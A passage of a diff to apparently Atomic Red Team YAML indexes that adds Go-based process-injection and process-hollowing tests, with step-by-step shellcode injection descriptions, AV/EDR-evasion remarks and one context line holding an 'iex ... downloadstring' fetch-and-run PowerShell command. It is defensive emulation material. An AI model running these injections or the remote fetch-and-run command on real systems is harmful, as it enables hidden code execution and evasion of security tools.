+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{spawn_process_name}" -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
+      auto_generated_guid: 4cc571b1-f450-414a-850f-879baf36aa06
+      description: "Uses the undocumented NtQueueAPCThreadEx WinAPI to create a \"Special
+        User APC\" in the current thread of the current process to execute shellcode.
+        \nSince the shellcode is loaded and executed in the current process it is
+        considered local shellcode execution.\n\nSteps taken with this technique\n1.
+        Allocate memory for the shellcode with VirtualAlloc setting the page permissions
+        to Read/Write\n2. Use the RtlCopyMemory macro to copy the shellcode to the
+        allocated memory space\n3. Change the memory page permissions to Execute/Read
+        with VirtualProtect\n4. Get a handle to the current thread\n5. Execute the
+        shellcode in the current thread by creating a Special User APC through the
+        NtQueueApcThreadEx function\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References:\n  - https://repnz.github.io/posts/apc/user-apc/\n  - https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html\n
+        \ - https://0x00sec.org/t/process-injection-apc-injection/24608\n  - https://twitter.com/aionescu/status/992264290924032005\n
+        \ - http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055.004\\bin\\x64\\NtQueueApcThreadEx.exe
+          -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1546.009:
     technique:
       x_mitre_platforms:
@@ -41361,6 +41895,60 @@ privilege-escalation:
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
         name: powershell
+    - name: Process Hollowing in Go using CreateProcessW WinAPI
+      auto_generated_guid: c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a
+      description: |
+        Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program
+          "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
+    - name: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
+      auto_generated_guid: 94903cc5-d462-498a-b919-b1e5ab155fee
+      description: |
+        Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
+        This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
+        allows for the retrieval of output generated from executed shellcode.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe
+          -program "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |-
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
   T1068:
     technique:
       modified: '2023-04-07T17:13:54.168Z'
@@ -48499,6 +49087,25 @@ execution:
       executor:
         command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')
         name: powershell
+    - name: Run Shellcode via Syscall in Go
+      auto_generated_guid: ae56083f-28d0-417d-84da-df4242da1f7c
+      description: |
+        Runs shellcode in the current running process via a syscall.
+
+        Steps taken with this technique
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Use syscall to execute the entrypoint of the shellcode
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#syscall)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1106\\bin\\x64\\syscall.exe -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1059.009:
     technique:
       modified: '2023-04-14T18:04:54.607Z'
diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml
index 6d60d8b2..b72dafa3 100644
--- a/atomics/Indexes/windows-index.yaml
+++ b/atomics/Indexes/windows-index.yaml
@@ -6432,6 +6432,192 @@ defense-evasion:
           Stop-Process -Force
         name: powershell
         elevation_required: true
+    - name: Process Injection with Go using UuidFromStringA WinAPI
+      auto_generated_guid: 2315ce15-38b6-46ac-a3eb-5e21abef2545
+      description: "Uses WinAPI UuidFromStringA to load shellcode to a memory address
+        then executes the shellcode using EnumSystemLocalesA.\nWith this technique,
+        memory is allocated on the heap and does not use commonly suspicious APIs
+        such as VirtualAlloc, WriteProcessMemory, or CreateThread \n- PoC Credit:
+        (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)\n- References:
+        \n  - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/\n
+        \ - https://twitter.com/_CPResearch_/status/1352310521752662018\n  - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\UuidFromStringA.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using EtwpCreateEtwThread WinAPI
+      auto_generated_guid: 7362ecef-6461-402e-8716-7410e1566400
+      description: "Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode
+        within the application's process.\nThis program loads the DLLs and gets a
+        handle to the used procedures itself instead of using the windows package
+        directly.\n\nSteps taken with this technique\n1. Allocate memory for the shellcode
+        with VirtualAlloc setting the page permissions to Read/Write\n2. Use the RtlCopyMemory
+        macro to copy the shellcode to the allocated memory space\n3. Change the memory
+        page permissions to Execute/Read with VirtualProtect\n4. Call EtwpCreateEtwThread
+        on shellcode address\n5. Call WaitForSingleObject so the program does not
+        end before the shellcode is executed\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)\n-
+        References: \n  - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3\n
+        \ - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\EtwpCreateEtwThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Remote Process Injection with Go using RtlCreateUserThread WinAPI
+      auto_generated_guid: a0c1725f-abcd-40d6-baac-020f3cf94ecd
+      description: "Executes shellcode in a remote process.\n\nSteps taken with this
+        technique\n1. Get a handle to the target process\n2. Allocate memory for the
+        shellcode with VirtualAllocEx setting the page permissions to Read/Write\n3.
+        Use the WriteProcessMemory to copy the shellcode to the allocated memory space
+        in the remote process\n4. Change the memory page permissions to Execute/Read
+        with VirtualProtectEx\n5. Execute the entrypoint of the shellcode in the remote
+        process with RtlCreateUserThread\n6. Close the handle to the remote process\n\n-
+        PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References: \n  - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI
+      auto_generated_guid: 69534efc-d5f5-4550-89e6-12c6457b9edd
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process.
+
+        This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
+
+        Steps taken with this technique
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
+         - References:
+          - https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
+      auto_generated_guid: 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Process Injection with Go using CreateThread WinAPI
+      auto_generated_guid: 2871ed59-3837-4a52-9107-99500ebc87cb
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using CreateThread WinAPI (Natively)
+      auto_generated_guid: 2a3c7035-d14f-467a-af94-933e49fe6786
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1205:
     technique:
       modified: '2022-10-19T23:08:40.603Z'
@@ -12569,6 +12755,60 @@ defense-evasion:
 
           '
         name: command_prompt
+    - name: EarlyBird APC Queue Injection in Go
+      auto_generated_guid: 73785dd2-323b-4205-ab16-bb6f06677e14
+      description: "Creates a process in a suspended state and calls QueueUserAPC
+        WinAPI to add a UserAPC to the child process that points to allocated shellcode.
+        \nResumeThread is called which then calls NtTestAlert to execute the created
+        UserAPC which then executes the shellcode.\nThis technique allows for the
+        early execution of shellcode and potentially before AV/EDR can hook functions
+        to support detection.\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)\n-
+        References: \n  - https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/\n
+        \ - https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process to spawn
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.004\bin\x64\EarlyBird.exe -program "#{spawn_process_path}"
+          -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{spawn_process_name}" -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
+      auto_generated_guid: 4cc571b1-f450-414a-850f-879baf36aa06
+      description: "Uses the undocumented NtQueueAPCThreadEx WinAPI to create a \"Special
+        User APC\" in the current thread of the current process to execute shellcode.
+        \nSince the shellcode is loaded and executed in the current process it is
+        considered local shellcode execution.\n\nSteps taken with this technique\n1.
+        Allocate memory for the shellcode with VirtualAlloc setting the page permissions
+        to Read/Write\n2. Use the RtlCopyMemory macro to copy the shellcode to the
+        allocated memory space\n3. Change the memory page permissions to Execute/Read
+        with VirtualProtect\n4. Get a handle to the current thread\n5. Execute the
+        shellcode in the current thread by creating a Special User APC through the
+        NtQueueApcThreadEx function\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References:\n  - https://repnz.github.io/posts/apc/user-apc/\n  - https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html\n
+        \ - https://0x00sec.org/t/process-injection-apc-injection/24608\n  - https://twitter.com/aionescu/status/992264290924032005\n
+        \ - http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055.004\\bin\\x64\\NtQueueApcThreadEx.exe
+          -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1647:
     technique:
       x_mitre_platforms:
@@ -16868,6 +17108,60 @@ defense-evasion:
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
         name: powershell
+    - name: Process Hollowing in Go using CreateProcessW WinAPI
+      auto_generated_guid: c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a
+      description: |
+        Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program
+          "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
+    - name: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
+      auto_generated_guid: 94903cc5-d462-498a-b919-b1e5ab155fee
+      description: |
+        Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
+        This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
+        allows for the retrieval of output generated from executed shellcode.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe
+          -program "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |-
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
   T1564.009:
     technique:
       x_mitre_platforms:
@@ -28316,6 +28610,192 @@ privilege-escalation:
           Stop-Process -Force
         name: powershell
         elevation_required: true
+    - name: Process Injection with Go using UuidFromStringA WinAPI
+      auto_generated_guid: 2315ce15-38b6-46ac-a3eb-5e21abef2545
+      description: "Uses WinAPI UuidFromStringA to load shellcode to a memory address
+        then executes the shellcode using EnumSystemLocalesA.\nWith this technique,
+        memory is allocated on the heap and does not use commonly suspicious APIs
+        such as VirtualAlloc, WriteProcessMemory, or CreateThread \n- PoC Credit:
+        (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)\n- References:
+        \n  - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/\n
+        \ - https://twitter.com/_CPResearch_/status/1352310521752662018\n  - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\UuidFromStringA.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using EtwpCreateEtwThread WinAPI
+      auto_generated_guid: 7362ecef-6461-402e-8716-7410e1566400
+      description: "Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode
+        within the application's process.\nThis program loads the DLLs and gets a
+        handle to the used procedures itself instead of using the windows package
+        directly.\n\nSteps taken with this technique\n1. Allocate memory for the shellcode
+        with VirtualAlloc setting the page permissions to Read/Write\n2. Use the RtlCopyMemory
+        macro to copy the shellcode to the allocated memory space\n3. Change the memory
+        page permissions to Execute/Read with VirtualProtect\n4. Call EtwpCreateEtwThread
+        on shellcode address\n5. Call WaitForSingleObject so the program does not
+        end before the shellcode is executed\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)\n-
+        References: \n  - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3\n
+        \ - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\EtwpCreateEtwThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Remote Process Injection with Go using RtlCreateUserThread WinAPI
+      auto_generated_guid: a0c1725f-abcd-40d6-baac-020f3cf94ecd
+      description: "Executes shellcode in a remote process.\n\nSteps taken with this
+        technique\n1. Get a handle to the target process\n2. Allocate memory for the
+        shellcode with VirtualAllocEx setting the page permissions to Read/Write\n3.
+        Use the WriteProcessMemory to copy the shellcode to the allocated memory space
+        in the remote process\n4. Change the memory page permissions to Execute/Read
+        with VirtualProtectEx\n5. Execute the entrypoint of the shellcode in the remote
+        process with RtlCreateUserThread\n6. Close the handle to the remote process\n\n-
+        PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References: \n  - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI
+      auto_generated_guid: 69534efc-d5f5-4550-89e6-12c6457b9edd
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process.
+
+        This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
+
+        Steps taken with this technique
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
+         - References:
+          - https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
+      auto_generated_guid: 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Process Injection with Go using CreateThread WinAPI
+      auto_generated_guid: 2871ed59-3837-4a52-9107-99500ebc87cb
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using CreateThread WinAPI (Natively)
+      auto_generated_guid: 2a3c7035-d14f-467a-af94-933e49fe6786
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1611:
     technique:
       modified: '2023-04-15T16:21:04.265Z'
@@ -30649,6 +31129,60 @@ privilege-escalation:
 
           '
         name: command_prompt
+    - name: EarlyBird APC Queue Injection in Go
+      auto_generated_guid: 73785dd2-323b-4205-ab16-bb6f06677e14
+      description: "Creates a process in a suspended state and calls QueueUserAPC
+        WinAPI to add a UserAPC to the child process that points to allocated shellcode.
+        \nResumeThread is called which then calls NtTestAlert to execute the created
+        UserAPC which then executes the shellcode.\nThis technique allows for the
+        early execution of shellcode and potentially before AV/EDR can hook functions
+        to support detection.\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)\n-
+        References: \n  - https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/\n
+        \ - https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process to spawn
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.004\bin\x64\EarlyBird.exe -program "#{spawn_process_path}"
+          -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{spawn_process_name}" -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
+      auto_generated_guid: 4cc571b1-f450-414a-850f-879baf36aa06
+      description: "Uses the undocumented NtQueueAPCThreadEx WinAPI to create a \"Special
+        User APC\" in the current thread of the current process to execute shellcode.
+        \nSince the shellcode is loaded and executed in the current process it is
+        considered local shellcode execution.\n\nSteps taken with this technique\n1.
+        Allocate memory for the shellcode with VirtualAlloc setting the page permissions
+        to Read/Write\n2. Use the RtlCopyMemory macro to copy the shellcode to the
+        allocated memory space\n3. Change the memory page permissions to Execute/Read
+        with VirtualProtect\n4. Get a handle to the current thread\n5. Execute the
+        shellcode in the current thread by creating a Special User APC through the
+        NtQueueApcThreadEx function\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
